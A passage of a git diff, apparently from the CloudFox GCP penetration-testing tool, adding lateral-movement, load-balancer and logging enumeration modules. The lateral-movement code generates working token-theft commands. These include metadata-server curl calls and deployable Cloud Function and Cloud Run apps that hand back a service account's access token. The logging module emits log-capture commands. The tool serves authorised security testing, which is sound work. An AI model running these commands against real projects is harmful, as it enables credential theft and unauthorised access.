be enabled + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + gcpinternal.HandleGCPError(err, logger, GCP_LATERALMOVEMENT_MODULE_NAME, + fmt.Sprintf("Could not get compute instances in project %s", projectID)) + } + return + } + + for _, instance := range instances { + // Skip instances without service accounts + if len(instance.ServiceAccounts) == 0 { + continue + } + + for _, sa := range instance.ServiceAccounts { + // Skip default compute SA if it has no useful scopes + if sa.Email == "" { + continue + } + + vector := TokenTheftVector{ + ResourceType: "compute_instance", + ResourceName: instance.Name, + ProjectID: projectID, + ServiceAccount: sa.Email, + AttackVector: "metadata_server", + RiskLevel: "HIGH", + ExploitCommand: fmt.Sprintf(`# SSH into instance and steal token +gcloud compute ssh %s --zone=%s --project=%s --command='curl -s -H "Metadata-Flavor: Google" "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token"'`, + instance.Name, instance.Zone, projectID), + } + + m.mu.Lock() + m.TokenTheftVectors = append(m.TokenTheftVectors, vector) + m.addTokenTheftVectorToLoot(vector) + m.mu.Unlock() + } + } +} + +// findCloudFunctionVectors finds Cloud Functions where tokens can be stolen +func (m *LateralMovementModule) findCloudFunctionVectors(ctx context.Context, projectID string, logger internal.Logger) { + functionsService := FunctionsService.New() + + functions, err := functionsService.Functions(projectID) + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + gcpinternal.HandleGCPError(err, logger, GCP_LATERALMOVEMENT_MODULE_NAME, + fmt.Sprintf("Could not get Cloud Functions in project %s", projectID)) + } + return + } + + for _, fn := range functions { + if fn.ServiceAccount == "" { + continue + } + + // Generate exploit with PoC code, deploy command, and invoke command + exploitCmd := fmt.Sprintf(`# Target: Cloud Function %s +# Service Account: %s +# Region: %s + +# Step 1: Create 
token exfiltration function code +mkdir -p /tmp/token-theft-%s && cd /tmp/token-theft-%s + +cat > main.py << 'PYEOF' +import functions_framework +import requests + +@functions_framework.http +def steal_token(request): + # Fetch SA token from metadata server + token_url = "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token" + headers = {"Metadata-Flavor": "Google"} + resp = requests.get(token_url, headers=headers) + token_data = resp.json() + + # Fetch SA email + email_url = "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/email" + email_resp = requests.get(email_url, headers=headers) + + return { + "service_account": email_resp.text, + "access_token": token_data.get("access_token"), + "token_type": token_data.get("token_type"), + "expires_in": token_data.get("expires_in") + } +PYEOF + +cat > requirements.txt << 'REQEOF' +functions-framework==3.* +requests==2.* +REQEOF + +# Step 2: Deploy function with target SA (requires cloudfunctions.functions.create + iam.serviceAccounts.actAs) +gcloud functions deploy token-theft-poc \ + --gen2 \ + --runtime=python311 \ + --region=%s \ + --source=. 
\ + --entry-point=steal_token \ + --trigger-http \ + --allow-unauthenticated \ + --service-account=%s \ + --project=%s + +# Step 3: Invoke function to get token +curl -s $(gcloud functions describe token-theft-poc --region=%s --project=%s --format='value(url)') + +# Cleanup +gcloud functions delete token-theft-poc --region=%s --project=%s --quiet`, + fn.Name, fn.ServiceAccount, fn.Region, + fn.Name, fn.Name, + fn.Region, fn.ServiceAccount, projectID, + fn.Region, projectID, + fn.Region, projectID) + + vector := TokenTheftVector{ + ResourceType: "cloud_function", + ResourceName: fn.Name, + ProjectID: projectID, + ServiceAccount: fn.ServiceAccount, + AttackVector: "function_execution", + RiskLevel: "HIGH", + ExploitCommand: exploitCmd, + } + + m.mu.Lock() + m.TokenTheftVectors = append(m.TokenTheftVectors, vector) + m.addTokenTheftVectorToLoot(vector) + m.mu.Unlock() + } +} + +// findCloudRunVectors finds Cloud Run services where tokens can be stolen +func (m *LateralMovementModule) findCloudRunVectors(ctx context.Context, projectID string, logger internal.Logger) { + cloudRunService := CloudRunService.New() + + services, err := cloudRunService.Services(projectID) + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + gcpinternal.HandleGCPError(err, logger, GCP_LATERALMOVEMENT_MODULE_NAME, + fmt.Sprintf("Could not get Cloud Run services in project %s", projectID)) + } + return + } + + for _, svc := range services { + if svc.ServiceAccount == "" { + continue + } + + // Generate exploit with PoC code, deploy command, and invoke command + exploitCmd := fmt.Sprintf(`# Target: Cloud Run Service %s +# Service Account: %s +# Region: %s + +# Step 1: Create token exfiltration container +mkdir -p /tmp/cloudrun-theft-%s && cd /tmp/cloudrun-theft-%s + +cat > main.py << 'PYEOF' +from flask import Flask, jsonify +import requests +import os + +app = Flask(__name__) + +@app.route("/") +def steal_token(): + # Fetch SA token from metadata server + token_url = 
"http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token" + headers = {"Metadata-Flavor": "Google"} + resp = requests.get(token_url, headers=headers) + token_data = resp.json() + + # Fetch SA email + email_url = "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/email" + email_resp = requests.get(email_url, headers=headers) + + return jsonify({ + "service_account": email_resp.text, + "access_token": token_data.get("access_token"), + "token_type": token_data.get("token_type"), + "expires_in": token_data.get("expires_in") + }) + +if __name__ == "__main__": + app.run(host="0.0.0.0", port=int(os.environ.get("PORT", 8080))) +PYEOF + +cat > requirements.txt << 'REQEOF' +flask==3.* +requests==2.* +gunicorn==21.* +REQEOF + +cat > Dockerfile << 'DOCKEOF' +FROM python:3.11-slim +WORKDIR /app +COPY requirements.txt . +RUN pip install --no-cache-dir -r requirements.txt +COPY main.py . +CMD exec gunicorn --bind :$PORT --workers 1 --threads 8 --timeout 0 main:app +DOCKEOF + +# Step 2: Build and push container +gcloud builds submit --tag gcr.io/%s/token-theft-poc --project=%s + +# Step 3: Deploy Cloud Run service with target SA (requires run.services.create + iam.serviceAccounts.actAs) +gcloud run deploy token-theft-poc \ + --image gcr.io/%s/token-theft-poc \ + --region=%s \ + --service-account=%s \ + --allow-unauthenticated \ + --project=%s + +# Step 4: Invoke service to get token +curl -s $(gcloud run services describe token-theft-poc --region=%s --project=%s --format='value(status.url)') + +# Cleanup +gcloud run services delete token-theft-poc --region=%s --project=%s --quiet +gcloud container images delete gcr.io/%s/token-theft-poc --quiet --force-delete-tags`, + svc.Name, svc.ServiceAccount, svc.Region, + svc.Name, svc.Name, + projectID, projectID, + projectID, svc.Region, svc.ServiceAccount, projectID, + svc.Region, projectID, + svc.Region, projectID, + projectID) + + vector := TokenTheftVector{ + 
ResourceType: "cloud_run", + ResourceName: svc.Name, + ProjectID: projectID, + ServiceAccount: svc.ServiceAccount, + AttackVector: "container_execution", + RiskLevel: "HIGH", + ExploitCommand: exploitCmd, + } + + m.mu.Lock() + m.TokenTheftVectors = append(m.TokenTheftVectors, vector) + m.addTokenTheftVectorToLoot(vector) + m.mu.Unlock() + } +} + +// findGKEVectors finds GKE clusters/node pools where tokens can be stolen +func (m *LateralMovementModule) findGKEVectors(ctx context.Context, projectID string, logger internal.Logger) { + gkeService := GKEService.New() + + clusters, nodePools, err := gkeService.Clusters(projectID) + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + gcpinternal.HandleGCPError(err, logger, GCP_LATERALMOVEMENT_MODULE_NAME, + fmt.Sprintf("Could not get GKE clusters in project %s", projectID)) + } + return + } + + // Track cluster SAs to avoid duplicates in node pools + clusterSAs := make(map[string]string) // clusterName -> SA + + for _, cluster := range clusters { + // Check node service account + if cluster.NodeServiceAccount != "" { + clusterSAs[cluster.Name] = cluster.NodeServiceAccount + + var exploitCmd string + if cluster.WorkloadIdentity != "" { + exploitCmd = fmt.Sprintf(`# Cluster uses Workload Identity - tokens are pod-specific +# Get credentials for cluster: +gcloud container clusters get-credentials %s --location=%s --project=%s +# Then exec into a pod and check for mounted SA token: +kubectl exec -it -- cat /var/run/secrets/kubernetes.io/serviceaccount/token`, + cluster.Name, cluster.Location, projectID) + } else { + exploitCmd = fmt.Sprintf(`# Cluster uses node SA (no Workload Identity) - all pods can access node SA +gcloud container clusters get-credentials %s --location=%s --project=%s +# Exec into any pod and steal node SA token: +kubectl exec -it -- curl -s -H "Metadata-Flavor: Google" "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token"`, + cluster.Name, 
cluster.Location, projectID) + } + + vector := TokenTheftVector{ + ResourceType: "gke_cluster", + ResourceName: cluster.Name, + ProjectID: projectID, + ServiceAccount: cluster.NodeServiceAccount, + AttackVector: "pod_service_account", + RiskLevel: "HIGH", + ExploitCommand: exploitCmd, + } + + m.mu.Lock() + m.TokenTheftVectors = append(m.TokenTheftVectors, vector) + m.addTokenTheftVectorToLoot(vector) + m.mu.Unlock() + } + } + + // Process node pools with different SAs than their cluster + for _, np := range nodePools { + clusterSA := clusterSAs[np.ClusterName] + if np.ServiceAccount == "" || np.ServiceAccount == clusterSA { + continue // Skip if same as cluster SA or empty + } + + exploitCmd := fmt.Sprintf(`# Node pool %s uses specific SA +gcloud container clusters get-credentials %s --location=%s --project=%s +# Exec into pod running on this node pool and steal token`, + np.Name, np.ClusterName, np.Location, projectID) + + vector := TokenTheftVector{ + ResourceType: "gke_nodepool", + ResourceName: fmt.Sprintf("%s/%s", np.ClusterName, np.Name), + ProjectID: projectID, + ServiceAccount: np.ServiceAccount, + AttackVector: "pod_service_account", + RiskLevel: "HIGH", + ExploitCommand: exploitCmd, + } + + m.mu.Lock() + m.TokenTheftVectors = append(m.TokenTheftVectors, vector) + m.addTokenTheftVectorToLoot(vector) + m.mu.Unlock() + } +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *LateralMovementModule) initializeLootFiles() { + m.LootMap["impersonation-chains-commands"] = &internal.LootFile{ + Name: "impersonation-chains-commands", + Contents: "# Impersonation Chain Exploit Commands\n# Generated by CloudFox\n\n", + } + m.LootMap["token-theft-commands"] = &internal.LootFile{ + Name: "token-theft-commands", + Contents: "# Token Theft Exploit Commands\n# Generated by CloudFox\n\n", + } +} + +func (m *LateralMovementModule) addImpersonationChainToLoot(chain ImpersonationChain, projectID string) { + 
m.LootMap["impersonation-chains-commands"].Contents += fmt.Sprintf( + "# Impersonation: %s -> %s\n"+ + "# Path: %s\n"+ + "%s\n\n", + chain.StartIdentity, + chain.TargetSA, + strings.Join(chain.Path, " -> "), + chain.ExploitCommand, + ) +} + +func (m *LateralMovementModule) addTokenTheftVectorToLoot(vector TokenTheftVector) { + m.LootMap["token-theft-commands"].Contents += fmt.Sprintf( + "# Token Theft: %s (%s)\n"+ + "# Project: %s\n"+ + "# Service Account: %s\n"+ + "# Attack Vector: %s\n"+ + "%s\n\n", + vector.ResourceType, + vector.ResourceName, + vector.ProjectID, + vector.ServiceAccount, + vector.AttackVector, + vector.ExploitCommand, + ) +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *LateralMovementModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Impersonation chains table + // Reads: Source identity can perform action on target service account + chainsHeader := []string{ + "Source Identity", + "Action", + "Target Service Account", + "Impersonation Path", + } + + var chainsBody [][]string + for _, chain := range m.ImpersonationChains { + // Determine action based on exploit command + action := "impersonate (get token)" + if strings.Contains(chain.ExploitCommand, "keys create") { + action = "create key" + } + + chainsBody = append(chainsBody, []string{ + chain.StartIdentity, + action, + chain.TargetSA, + strings.Join(chain.Path, " -> "), + }) + } + + // Token theft vectors table + vectorsHeader := []string{ + "Project Name", + "Project ID", + "Source Resource Type", + "Source Resource Name", + "Action", + "Target Service Account", + } + + var vectorsBody [][]string + for _, vector := range m.TokenTheftVectors { + // Map attack vector to action description + action := vector.AttackVector + switch vector.AttackVector { + case "metadata_server": + action = "steal token (metadata)" + case "function_execution": + action = "steal token (function)" + case "container_execution": + action 
= "steal token (container)" + case "pod_service_account": + action = "steal token (pod)" + } + + vectorsBody = append(vectorsBody, []string{ + m.GetProjectName(vector.ProjectID), + vector.ProjectID, + vector.ResourceType, + vector.ResourceName, + action, + vector.ServiceAccount, + }) + } + + // Collect loot files + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + // Build tables + tables := []internal.TableFile{} + + if len(chainsBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "lateral-impersonation-chains", + Header: chainsHeader, + Body: chainsBody, + }) + logger.InfoM(fmt.Sprintf("[PENTEST] Found %d impersonation chain(s)", len(chainsBody)), GCP_LATERALMOVEMENT_MODULE_NAME) + } + + if len(vectorsBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "lateral-token-theft", + Header: vectorsHeader, + Body: vectorsBody, + }) + } + + output := LateralMovementOutput{ + Table: tables, + Loot: lootFiles, + } + + // Build scopeNames using GetProjectName + scopeNames := make([]string, len(m.ProjectIDs)) + for i, projectID := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(projectID) + } + + // Write output + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + scopeNames, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), GCP_LATERALMOVEMENT_MODULE_NAME) + m.CommandCounter.Error++ + } +} diff --git a/gcp/commands/loadbalancers.go b/gcp/commands/loadbalancers.go new file mode 100644 index 00000000..aba9f74f --- /dev/null +++ b/gcp/commands/loadbalancers.go @@ -0,0 +1,281 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + loadbalancerservice "github.com/BishopFox/cloudfox/gcp/services/loadbalancerService" + 
"github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPLoadBalancersCommand = &cobra.Command{ + Use: globals.GCP_LOADBALANCERS_MODULE_NAME, + Aliases: []string{"lb", "lbs"}, + Short: "Enumerate Load Balancers", + Long: `Enumerate Load Balancers and related configurations. + +Features: +- Lists all forwarding rules (global and regional) +- Shows backend services and health checks +- Analyzes SSL policies for weak configurations +- Identifies external vs internal load balancers +- Checks for Cloud Armor security policies`, + Run: runGCPLoadBalancersCommand, +} + +type LoadBalancersModule struct { + gcpinternal.BaseGCPModule + LoadBalancers []loadbalancerservice.LoadBalancerInfo + SSLPolicies []loadbalancerservice.SSLPolicyInfo + BackendServices []loadbalancerservice.BackendServiceInfo + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +type LoadBalancersOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o LoadBalancersOutput) TableFiles() []internal.TableFile { return o.Table } +func (o LoadBalancersOutput) LootFiles() []internal.LootFile { return o.Loot } + +func runGCPLoadBalancersCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_LOADBALANCERS_MODULE_NAME) + if err != nil { + return + } + + module := &LoadBalancersModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + LoadBalancers: []loadbalancerservice.LoadBalancerInfo{}, + SSLPolicies: []loadbalancerservice.SSLPolicyInfo{}, + BackendServices: []loadbalancerservice.BackendServiceInfo{}, + LootMap: make(map[string]*internal.LootFile), + } + module.initializeLootFiles() + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +func (m *LoadBalancersModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, 
globals.GCP_LOADBALANCERS_MODULE_NAME, m.processProject) + + if len(m.LoadBalancers) == 0 { + logger.InfoM("No load balancers found", globals.GCP_LOADBALANCERS_MODULE_NAME) + return + } + + externalCount := 0 + for _, lb := range m.LoadBalancers { + if lb.Scheme == "EXTERNAL" { + externalCount++ + } + } + + logger.SuccessM(fmt.Sprintf("Found %d load balancer(s) (%d external), %d SSL policies, %d backend services", + len(m.LoadBalancers), externalCount, len(m.SSLPolicies), len(m.BackendServices)), globals.GCP_LOADBALANCERS_MODULE_NAME) + m.writeOutput(ctx, logger) +} + +func (m *LoadBalancersModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating load balancers in project: %s", projectID), globals.GCP_LOADBALANCERS_MODULE_NAME) + } + + svc := loadbalancerservice.New() + + // Get load balancers + lbs, err := svc.ListLoadBalancers(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_LOADBALANCERS_MODULE_NAME, + fmt.Sprintf("Could not list load balancers in project %s", projectID)) + } else { + m.mu.Lock() + m.LoadBalancers = append(m.LoadBalancers, lbs...) + m.mu.Unlock() + } + + // Get SSL policies + sslPolicies, err := svc.ListSSLPolicies(projectID) + if err == nil { + m.mu.Lock() + m.SSLPolicies = append(m.SSLPolicies, sslPolicies...) + m.mu.Unlock() + } + + // Get backend services + backends, err := svc.ListBackendServices(projectID) + if err == nil { + m.mu.Lock() + m.BackendServices = append(m.BackendServices, backends...) 
+ m.mu.Unlock() + } + + m.mu.Lock() + for _, lb := range lbs { + m.addToLoot(lb) + } + m.mu.Unlock() +} + +func (m *LoadBalancersModule) initializeLootFiles() { + m.LootMap["loadbalancers-commands"] = &internal.LootFile{ + Name: "loadbalancers-commands", + Contents: "# Load Balancer Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } +} + +func (m *LoadBalancersModule) addToLoot(lb loadbalancerservice.LoadBalancerInfo) { + m.LootMap["loadbalancers-commands"].Contents += fmt.Sprintf( + "## Load Balancer: %s (Project: %s)\n"+ + "# Type: %s, Scheme: %s, IP: %s, Port: %s\n\n", + lb.Name, lb.ProjectID, lb.Type, lb.Scheme, lb.IPAddress, lb.Port) + + // Describe forwarding rule + if lb.Region == "global" { + m.LootMap["loadbalancers-commands"].Contents += fmt.Sprintf( + "# Describe global forwarding rule:\n"+ + "gcloud compute forwarding-rules describe %s --global --project=%s\n\n", + lb.Name, lb.ProjectID) + } else { + m.LootMap["loadbalancers-commands"].Contents += fmt.Sprintf( + "# Describe regional forwarding rule:\n"+ + "gcloud compute forwarding-rules describe %s --region=%s --project=%s\n\n", + lb.Name, lb.Region, lb.ProjectID) + } + + // Backend service commands + for _, backend := range lb.BackendServices { + m.LootMap["loadbalancers-commands"].Contents += fmt.Sprintf( + "# Describe backend service:\n"+ + "gcloud compute backend-services describe %s --global --project=%s\n\n", + backend, lb.ProjectID) + } +} + +func (m *LoadBalancersModule) writeOutput(ctx context.Context, logger internal.Logger) { + var tables []internal.TableFile + + // Load Balancers table + lbHeader := []string{"Project Name", "Project ID", "Name", "Type", "Scheme", "Region", "IP Address", "Port", "Backend Services", "Security Policy"} + var lbBody [][]string + for _, lb := range m.LoadBalancers { + backends := "-" + if len(lb.BackendServices) > 0 { + backends = strings.Join(lb.BackendServices, ", ") + } + secPolicy := "-" + if lb.SecurityPolicy != "" { 
+ secPolicy = lb.SecurityPolicy + } + lbBody = append(lbBody, []string{ + m.GetProjectName(lb.ProjectID), + lb.ProjectID, + lb.Name, + lb.Type, + lb.Scheme, + lb.Region, + lb.IPAddress, + lb.Port, + backends, + secPolicy, + }) + } + tables = append(tables, internal.TableFile{ + Name: "load-balancers", + Header: lbHeader, + Body: lbBody, + }) + + // SSL Policies table + if len(m.SSLPolicies) > 0 { + sslHeader := []string{"Project Name", "Project ID", "Name", "Min TLS Version", "Profile", "Custom Features"} + var sslBody [][]string + for _, policy := range m.SSLPolicies { + customFeatures := "-" + if len(policy.CustomFeatures) > 0 { + customFeatures = strings.Join(policy.CustomFeatures, ", ") + } + sslBody = append(sslBody, []string{ + m.GetProjectName(policy.ProjectID), + policy.ProjectID, + policy.Name, + policy.MinTLSVersion, + policy.Profile, + customFeatures, + }) + } + tables = append(tables, internal.TableFile{ + Name: "ssl-policies", + Header: sslHeader, + Body: sslBody, + }) + } + + // Backend Services table + if len(m.BackendServices) > 0 { + beHeader := []string{"Project Name", "Project ID", "Name", "Protocol", "Port", "Security Policy", "CDN Enabled", "Health Check", "Session Affinity", "Backends"} + var beBody [][]string + for _, be := range m.BackendServices { + secPolicy := "-" + if be.SecurityPolicy != "" { + secPolicy = be.SecurityPolicy + } + healthCheck := "-" + if be.HealthCheck != "" { + healthCheck = be.HealthCheck + } + sessionAffinity := "-" + if be.SessionAffinity != "" { + sessionAffinity = be.SessionAffinity + } + backends := "-" + if len(be.Backends) > 0 { + backends = strings.Join(be.Backends, ", ") + } + beBody = append(beBody, []string{ + m.GetProjectName(be.ProjectID), + be.ProjectID, + be.Name, + be.Protocol, + fmt.Sprintf("%d", be.Port), + secPolicy, + boolToYesNo(be.EnableCDN), + healthCheck, + sessionAffinity, + backends, + }) + } + tables = append(tables, internal.TableFile{ + Name: "backend-services", + Header: beHeader, + Body: 
beBody, + }) + } + + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + output := LoadBalancersOutput{Table: tables, Loot: lootFiles} + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart("gcp", m.Format, m.OutputDirectory, m.Verbosity, m.WrapTable, + "project", m.ProjectIDs, scopeNames, m.Account, output) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_LOADBALANCERS_MODULE_NAME) + } +} diff --git a/gcp/commands/logging.go b/gcp/commands/logging.go new file mode 100644 index 00000000..c89c9f6f --- /dev/null +++ b/gcp/commands/logging.go @@ -0,0 +1,473 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + LoggingService "github.com/BishopFox/cloudfox/gcp/services/loggingService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPLoggingCommand = &cobra.Command{ + Use: globals.GCP_LOGGING_MODULE_NAME, + Aliases: []string{"logs", "sinks", "log-sinks"}, + Short: "Enumerate Cloud Logging sinks and metrics with security analysis", + Long: `Enumerate Cloud Logging sinks and log-based metrics across projects. 
+ +Features: +- Lists all logging sinks (log exports) +- Shows sink destinations (Storage, BigQuery, Pub/Sub, Logging buckets) +- Identifies cross-project log exports +- Shows sink filters and exclusions +- Lists log-based metrics for alerting +- Generates gcloud commands for further analysis + +Security Columns: +- Destination: Where logs are exported (bucket, dataset, topic) +- CrossProject: Whether logs are exported to another project +- WriterIdentity: Service account used for export +- Filter: What logs are included/excluded + +Attack Surface: +- Cross-project exports may leak logs to external projects +- Sink writer identity may have excessive permissions +- Disabled sinks may indicate log evasion +- Missing sinks may indicate lack of log retention`, + Run: runGCPLoggingCommand, +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type LoggingModule struct { + gcpinternal.BaseGCPModule + + Sinks []LoggingService.SinkInfo + Metrics []LoggingService.MetricInfo + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type LoggingOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o LoggingOutput) TableFiles() []internal.TableFile { return o.Table } +func (o LoggingOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPLoggingCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_LOGGING_MODULE_NAME) + if err != nil { + return + } + + module := &LoggingModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + Sinks: []LoggingService.SinkInfo{}, + Metrics: []LoggingService.MetricInfo{}, + LootMap: make(map[string]*internal.LootFile), + } + + module.initializeLootFiles() + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// 
------------------------------ +// Module Execution +// ------------------------------ +func (m *LoggingModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_LOGGING_MODULE_NAME, m.processProject) + + if len(m.Sinks) == 0 && len(m.Metrics) == 0 { + logger.InfoM("No logging sinks or metrics found", globals.GCP_LOGGING_MODULE_NAME) + return + } + + // Count interesting sinks + crossProjectCount := 0 + disabledCount := 0 + for _, sink := range m.Sinks { + if sink.IsCrossProject { + crossProjectCount++ + } + if sink.Disabled { + disabledCount++ + } + } + + msg := fmt.Sprintf("Found %d sink(s), %d metric(s)", len(m.Sinks), len(m.Metrics)) + if crossProjectCount > 0 { + msg += fmt.Sprintf(" [%d cross-project]", crossProjectCount) + } + if disabledCount > 0 { + msg += fmt.Sprintf(" [%d disabled]", disabledCount) + } + logger.SuccessM(msg, globals.GCP_LOGGING_MODULE_NAME) + + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *LoggingModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating Logging in project: %s", projectID), globals.GCP_LOGGING_MODULE_NAME) + } + + ls := LoggingService.New() + + // Get sinks + sinks, err := ls.Sinks(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_LOGGING_MODULE_NAME, + fmt.Sprintf("Could not enumerate logging sinks in project %s", projectID)) + } else { + m.mu.Lock() + m.Sinks = append(m.Sinks, sinks...) 
+ for _, sink := range sinks { + m.addSinkToLoot(sink) + } + m.mu.Unlock() + } + + // Get metrics + metrics, err := ls.Metrics(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_LOGGING_MODULE_NAME, + fmt.Sprintf("Could not enumerate log metrics in project %s", projectID)) + } else { + m.mu.Lock() + m.Metrics = append(m.Metrics, metrics...) + for _, metric := range metrics { + m.addMetricToLoot(metric) + } + m.mu.Unlock() + } + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Found %d sink(s), %d metric(s) in project %s", len(sinks), len(metrics), projectID), globals.GCP_LOGGING_MODULE_NAME) + } +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *LoggingModule) initializeLootFiles() { + // Sinks loot files + m.LootMap["sinks-commands"] = &internal.LootFile{ + Name: "sinks-commands", + Contents: "# Cloud Logging Sinks Commands\n# Generated by CloudFox\n\n", + } + m.LootMap["sinks-cross-project"] = &internal.LootFile{ + Name: "sinks-cross-project", + Contents: "# Cross-Project Log Exports\n# Generated by CloudFox\n# These sinks export logs to external projects\n\n", + } + m.LootMap["sinks-writer-identities"] = &internal.LootFile{ + Name: "sinks-writer-identities", + Contents: "# Logging Sink Writer Identities\n# Generated by CloudFox\n# Service accounts that have write access to destinations\n\n", + } + // Metrics loot files + m.LootMap["metrics-commands"] = &internal.LootFile{ + Name: "metrics-commands", + Contents: "# Cloud Logging Metrics Commands\n# Generated by CloudFox\n\n", + } +} + +func (m *LoggingModule) addSinkToLoot(sink LoggingService.SinkInfo) { + // Sinks commands file + m.LootMap["sinks-commands"].Contents += fmt.Sprintf( + "# Sink: %s (Project: %s)\n"+ + "# Destination: %s (%s)\n"+ + "gcloud logging sinks describe %s --project=%s\n", + sink.Name, sink.ProjectID, + sink.DestinationType, 
getDestinationName(sink), + sink.Name, sink.ProjectID, + ) + + // Add destination-specific commands + switch sink.DestinationType { + case "storage": + if sink.DestinationBucket != "" { + m.LootMap["sinks-commands"].Contents += fmt.Sprintf( + "gsutil ls gs://%s/\n"+ + "gsutil cat gs://%s/**/*.json 2>/dev/null | head -100\n", + sink.DestinationBucket, sink.DestinationBucket, + ) + } + case "bigquery": + if sink.DestinationDataset != "" { + destProject := sink.DestinationProject + if destProject == "" { + destProject = sink.ProjectID + } + m.LootMap["sinks-commands"].Contents += fmt.Sprintf( + "bq ls %s:%s\n"+ + "bq query --use_legacy_sql=false 'SELECT * FROM `%s.%s.*` LIMIT 100'\n", + destProject, sink.DestinationDataset, + destProject, sink.DestinationDataset, + ) + } + case "pubsub": + if sink.DestinationTopic != "" { + destProject := sink.DestinationProject + if destProject == "" { + destProject = sink.ProjectID + } + m.LootMap["sinks-commands"].Contents += fmt.Sprintf( + "gcloud pubsub subscriptions create log-capture --topic=%s --project=%s\n"+ + "gcloud pubsub subscriptions pull log-capture --limit=10 --auto-ack --project=%s\n", + sink.DestinationTopic, destProject, destProject, + ) + } + } + m.LootMap["sinks-commands"].Contents += "\n" + + // Cross-project exports + if sink.IsCrossProject { + filter := sink.Filter + if filter == "" { + filter = "(no filter - all logs)" + } + m.LootMap["sinks-cross-project"].Contents += fmt.Sprintf( + "# Sink: %s\n"+ + "# Source Project: %s\n"+ + "# Destination Project: %s\n"+ + "# Destination Type: %s\n"+ + "# Destination: %s\n"+ + "# Filter: %s\n"+ + "# Writer Identity: %s\n\n", + sink.Name, + sink.ProjectID, + sink.DestinationProject, + sink.DestinationType, + sink.Destination, + filter, + sink.WriterIdentity, + ) + } + + // Writer identities + if sink.WriterIdentity != "" { + m.LootMap["sinks-writer-identities"].Contents += fmt.Sprintf( + "# Sink: %s -> %s (%s)\n"+ + "%s\n\n", + sink.Name, sink.DestinationType, 
